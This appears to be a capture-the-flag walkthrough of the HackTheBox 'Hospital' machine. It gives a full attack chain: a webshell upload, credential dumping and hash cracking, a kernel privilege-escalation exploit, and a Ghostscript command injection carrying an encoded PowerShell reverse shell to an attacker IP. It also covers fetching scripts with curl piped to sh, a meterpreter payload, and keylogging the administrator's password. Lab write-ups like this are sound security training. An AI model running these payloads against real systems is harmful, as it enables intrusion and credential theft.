Hospital
Recon
HTTP (8080)
Creds:
letmein:letmein
When logged in we get an upload form:
We can fuzz the extension to see which one is valid or not.
Wordlist =
/usr/share/seclists/Discovery/Web-Content/web-extensions.txt
To add string matching go to Settings, Grep Match, add string and include headers.
Not sure why, but shell.phar wasn't getting uploaded. Changing the name helped.
Webshell: http://hospital.htb:8080/uploads/letmein.phar
www-data@webserver:…/www/html# cat config.php
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'my$qls3rv1c3!');
define('DB_NAME', 'hospital');
/* Attempt to connect to MySQL database */
$link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
// Check connection
if($link === false){
die("ERROR: Could not connect. " . mysqli_connect_error());
}
?>www-data@webserver:…/www/html# mysql -u root -p'my$qls3rv1c3!' -e 'SHOW DATABASES;'
Database
hospital
information_schema
mysql
performance_schema
sys
www-data@webserver:…/www/html# mysql -u root -p'my$qls3rv1c3!' hospital -e 'SHOW TABLES;'
Tables_in_hospital
users
www-data@webserver:…/www/html# mysql -u root -p'my$qls3rv1c3!' hospital -e 'SELECT * FROM users;'
id username password created_at
1 admin $2y$10$caGIEbf9DBF7ddlByqCkrexkt0cPseJJ5FiVO1cnhG.3NLrxcjMh2 2023-09-21 14:46:04
2 patient $2y$10$a.lNstD7JdiNYxEepKf1/OZ5EM5wngYrf.m5RxXCgSud7MVU6/tgO 2023-09-21 15:35:11
3 letmein $2y$10$PW.UkTvD9dHa4US0a6Ke5.0uAiwRZTT5mbH7ixP3NyKoByFk/W4su 2024-11-26 02:53:45Bruteforce admin password
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt .\hashes
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
123456 (?)
1g 0:00:00:00 DONE (2024-11-26 00:20) 1.915g/s 137.9p/s 137.9c/s 137.9C/s 123456..666666
Use the "--show" option to display all of the cracked passwords reliably
Session completedCreds don't work anywhere we know...
This is a Windows machine, but clearly we are inside Linux container. Linpeas didn't give anything useful, box is somewhat old so we can assume there's kernel exploit of some sort.
www-data@webserver:/var/www/html/uploads$ curl 10.10.14.99/lp.sh|sh|tee /tmp/lp.log
╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 5.19.0-35-generic (buildd@lcy02-amd64-014) (x86_64-linux-gnu-gcc-12 (Ubuntu 12.2.0-3ubuntu1) 12.2.0, GNU ld (GNU Binutils for Ubuntu) 2.39) #36-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 3 18:36:56 UTC 2023
Distributor ID: Ubuntu
Description: Ubuntu 23.04
Release: 23.04
Codename: lunar
...
╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/usr/bin/go
/snap/bin/lxc
/usr/bin/make
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/bin/socat
/usr/bin/sudo
/usr/bin/wgetCVE-2023-35001: Exploit used at pwn2own Vancouver 2023 on Ubuntu desktop. The exploit supports the kernel version available at the beginning of the event (5.19.0-35).
For whatever reason there's golang install on machine and we can leverage that to use exploit.
└─$ git clone https://github.com/synacktiv/CVE-2023-35001.git
└─$ cd CVE-2023-35001
└─$ make
---
www-data@webserver:/tmp$ cd `mktemp -d`
www-data@webserver:/tmp/tmp.GNtdK2Vpxo$ curl 10.10.14.99/CVE-2023-35001/lpe.zip -O
www-data@webserver:/tmp/tmp.GNtdK2Vpxo$ busybox unzip lpe.zip
www-data@webserver:/tmp/tmp.GNtdK2Vpxo$ chmod +x ./*
www-data@webserver:/tmp/tmp.GNtdK2Vpxo$ ./exploit
./exploit
[+] Using config: 5.19.0-35-generic
[+] Recovering module base
[+] Module base: 0xffffffffc0679000
[+] Recovering kernel base
[+] Kernel base: 0xffffffffaa000000
[+] Got root !!!
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cat /etc/shadow | grep ':\$'
root:$y$j9T$s/Aqv48x449udndpLC6eC.$WUkrXgkW46N4xdpnhMoax7US.JgyJSeobZ1dzDs..dD:19612:0:99999:7:::
drwilliams:$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:19612:0:99999:7:::Note: CVE-2023-2640-CVE-2023-32629 GameOver(lay) exploit should also be valid for this kernel.
The only valid hash should be drwilliams
➜ .\hashcat.exe --show .\hashes
1800 | sha512crypt $6$, SHA512 (Unix) | Operating System
➜ .\hashcat.exe -m 1800 -a 0 .\hashes .\rockyou.txt
$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:qwe123!@#HTTPs (443)
There's HTTPs server which is serving RoundCube webmail.
Creds:
drwilliams:qwe123!@#
Using SSH credentials we can log into webmail. New user drbrown.
About shows version Roundcube Webmail 1.6.4: CVE-2023-43770-POC XSS vulnerability. Can't do much with XSS, so probably not useful...
CVE-2023-36664
drbrown is waiting for GhostScript, CVE-2023-36664-Ghostscript-command-injection could be valid exploit considering the dates.
└─$ git clone https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection.git
└─$ cd CVE-2023-36664-Ghostscript-command-injection
└─$ py CVE_2023_36664_exploit.py -f file.eps -p 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOQA5ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==' -iSending the email directly to drbrown doesn't get triggered, but replying to his message gives back connection.
└─$ listen
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.229.189:8166.
whoami /all
User Name SID
================ ==============================================
hospital\drbrown S-1-5-21-4208260710-2273545631-1523135639-1601
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users Alias S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
PS C:\Users\drbrown.HOSPITAL\Documents> cat ghostscript.bat
@echo off
set filename=%~1
powershell -command "$p = convertto-securestring 'chr!$br0wn' -asplain -force;$c = new-object system.management.automation.pscredential('hospital\drbrown', $p);Invoke-Command -ComputerName dc -Credential $c -ScriptBlock { cmd.exe /c "C:\Program` Files\gs\gs10.01.1\bin\gswin64c.exe" -dNOSAFER "C:\Users\drbrown.HOSPITAL\Downloads\%filename%" }"WinRM
Creds:
drbrown:chr!$br0wn
└─$ netexec smb 10.129.229.189 -u 'drbrown' -p 'chr!$br0wn'
SMB 10.129.229.189 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:hospital.htb) (signing:True) (SMBv1:False)
SMB 10.129.229.189 445 DC [+] hospital.htb\drbrown:chr!$br0wn
└─$ netexec winrm 10.129.229.189 -u 'drbrown' -p 'chr!$br0wn'
WINRM 10.129.229.189 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:hospital.htb)
WINRM 10.129.229.189 5985 DC [+] hospital.htb\drbrown:chr!$br0wn (Pwn3d!)
└─$ evil-winrm -i hospital.htb -u 'drbrown' -p 'chr!$br0wn'
*Evil-WinRM* PS C:\Users\drbrown.HOSPITAL\Documents>User.txt
*Evil-WinRM* PS C:\Users\drbrown.HOSPITls -fil *.txt -rec -file | % { $_; echo " "; cat $_.FullName; }
Directory: C:\Users\drbrown.HOSPITAL\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/25/2024 6:42 PM 34 user.txt
793506c3c5106406a122b94fec45c2d3Privilege Escalation
Nothing useful from bloodhound
└─$ bloodhound-python -ns 10.129.229.189 -d hospital.htb -u 'drbrown' -p 'chr!$br0wn' -c all --zip -op drbrownEnumerate with winpeas
*Evil-WinRM* PS C:\Users\drbrown.HOSPITAL\Music> iwr 10.10.14.99/wp.exe -outfile wp.exe
*Evil-WinRM* PS C:\Users\drbrown.HOSPITAL\Music> .\wp.exe | tee-object -filepath wp.log
...
ÉÍÍÍÍÍÍÍÍÍ͹ System Environment Variables
È Check for some passwords or keys in the env variables
[X] Exception: Unable to cast object of type 'System.Int32' to type 'System.String'.
ComSpec: C:\Windows\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
OS: Windows_NT
Path: C:\Program Files\Python312\Scripts\;C:\Program Files\Python312\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\gs\gs10.01.1\bin;C:\Program Files\PuTTY\;C:\Program Files\dotnet\
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.PY;.PYW
PROCESSOR_ARCHITECTURE: AMD64
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
TEMP: C:\Windows\TEMP
TMP: C:\Windows\TEMP
USERNAME: SYSTEM
windir: C:\Windows
NUMBER_OF_PROCESSORS: 2
PROCESSOR_LEVEL: 25
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_REVISION: 0101
...
ÉÍÍÍÍÍÍÍÍÍ͹ AV Information
[X] Exception: Invalid namespace
No AV was detected!!
Not Found
...
ÉÍÍÍÍÍÍÍÍÍ͹ UAC Status
È If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
EnableLUA: 1
LocalAccountTokenFilterPolicy:
FilterAdministratorToken:
[*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
[-] Only the RID-500 local admin account can be used for lateral movement.
...
ÉÍÍÍÍÍÍÍÍÍ͹ Interesting Services -non Microsoft-
È Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
[X] Exception: Access denied
Apache2.4(Apache Software Foundation - Apache2.4)["C:\xampp\apache\bin\httpd.exe" -k runservice] - Autoload
Possible DLL Hijacking in binary folder: C:\xampp\apache\bin (Users [AppendData/CreateDirectories WriteData/CreateFiles])
Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
...
ÉÍÍÍÍÍÍÍÍÍ͹ Searching executable files in non-default folders with write (equivalent) permissions (can be slow)
File Permissions "C:\Users\drbrown.HOSPITAL\Music\wp.exe": drbrown [AllAccess]
File Permissions "C:\Users\drbrown.HOSPITAL\Documents\ghostscript.bat": drbrown [AllAccess]
File Permissions "C:\Users\drbrown.HOSPITAL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\connect.bat": drbrown [AllAccess]
File Permissions "C:\Users\drbrown.HOSPITAL\.cache\selenium\IEDriverServer\win32\4.14.0\IEDriverServer.exe": drbrown [AllAccess]
...
ÉÍÍÍÍÍÍÍÍÍ͹ RDP Sessions
SessID pSessionName pUserName pDomainName State SourceIP
1 Console drbrown HOSPITAL ActivePath 1
We basically have write permissions on XAMPP, usually due to misconfiguration it's not protected and it's also running as NT SYSTEM...
*Evil-WinRM* PS C:\xampp\htdocs> curl 10.10.14.99/shell.php -outfile C:\xampp\htdocs\shell.php
Path 2 (Failed)
Because of UAC policy RunasCs should have worked, but it failed... Interesting.
.\rc.exe drbrown 'chr!$br0wn' 'whoami /all' -b -l 5Path 3
If we RDP we can observe the automated script logging into the webmail, probably to emulate the user.
Creds: Administrator:Th3B3stH0sp1t4l9786!
Path 4
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o rev.exe
└─$ msfconsole -q
msf6 > use multi/handler
msf6 exploit(multi/handler) > set LHOST tun0
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
---
*Evil-WinRM* PS C:\Users\drbrown.HOSPITAL\Music> upload www/rev.exe
Info: Uploading /home/woyag/Desktop/Rooms/Hospital/www/rev.exe to C:\Users\drbrown.HOSPITAL\Music\rev.exe
---https://www.offsec.com/metasploit-unleashed/keylogging/
When you want to listen for keystrokes either you attach yourself to process or explorer, generally explorer would be better idea.
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
6600 6680 explorer.exe x64 1 HOSPITAL\drbrown C:\Windows\explorer.exe
meterpreter > migrate 2668
[*] Migrating from 760 to 2668...
meterpreter > keyscan_start
Starting the keystroke sniffer ...
meterpreter > keyscan_dump
Dumping captured keystrokes...
administratorTh3B3stH0s
meterpreter > keyscan_dump
Dumping captured keystrokes...
p1t4l97861AdministratorTh3B3stH0sp1t4l9786!└─$ evil-winrm -i hospital.htb -u 'Administrator' -p 'Th3B3stH0sp1t4l9786!'Root.txt
*Evil-WinRM* PS C:\Users\Administrator> ls -fil *.txt -rec -file | % { $_; echo " "; cat $_.FullName; }
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/26/2024 5:11 PM 34 root.txt
ce1ed92833a67c42e95b78194c9c6941Last updated